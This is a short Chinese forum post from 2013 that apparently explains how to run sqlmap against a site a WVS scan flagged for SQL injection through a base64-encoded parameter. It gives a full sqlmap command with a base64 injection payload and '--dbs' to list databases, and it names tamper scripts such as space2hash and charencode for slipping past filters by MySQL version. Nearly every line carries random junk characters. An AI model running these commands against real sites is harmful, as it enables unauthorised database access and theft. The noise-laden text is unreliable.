WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
3 P1 A# @: D+ M0 [0 x3 I1 ?$ x% z) j" N* K$ g
sqlmap的tamper里有个base64encode.py
! S1 V6 s5 @; Y! k+ I1 \' g V$ k; Z& S+ J% E( g1 D: ^
使用如下6 i3 M8 W+ F {( Z! o6 d
/ e% K8 k# C8 Z. a6 V
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
* Y! p6 k$ b5 J& K; [* i
# H5 N( r2 }" Z) I$ w, p0 }2 ~3 u( m4 j
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
$ h# s9 r' i) s3 h4 l
5 w/ E- Z: y: J5 ]/ E其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
, i. ?* S) w9 p0 t8 \1 r' ~" N$ x- J4 B' I4 B
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入, i! p/ p- P2 Q* X1 M/ @
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入0 l' Z4 g( e- n, I) ]- r; q/ I9 u& j
首先确定目标数据库版本,然后选择相应的脚本。1 \% X' z! Q! G8 ]: t/ |+ T$ ?
-v 3 --batch --tamper "space2hash.py"# w4 m, e! m3 [+ M6 @
u! c& |. H& p2 s; p% t6 ^5 `还有其他一些插件:
$ X; W2 @. U7 l- W7 jencodes编码 ——charencode.py- L8 ~+ i( U1 Z6 v, r1 L
base64编码 —— base64encode.py: q0 o7 Q6 {! f2 b5 e- [2 O$ H- E
替换空格和关键字 —— halfversionedmorekeywords.py0 Z, V3 N" c' K' ]6 d# \% N1 ^
|
+ ?# N/ B7 T' D( s
{2 e! C. D, Z
9 q6 `' I/ O8 r3 R+ o2 D
& z* i) S6 e* E% d! w |
发表于 2013-11-23 15:50:45
收藏
支持
反对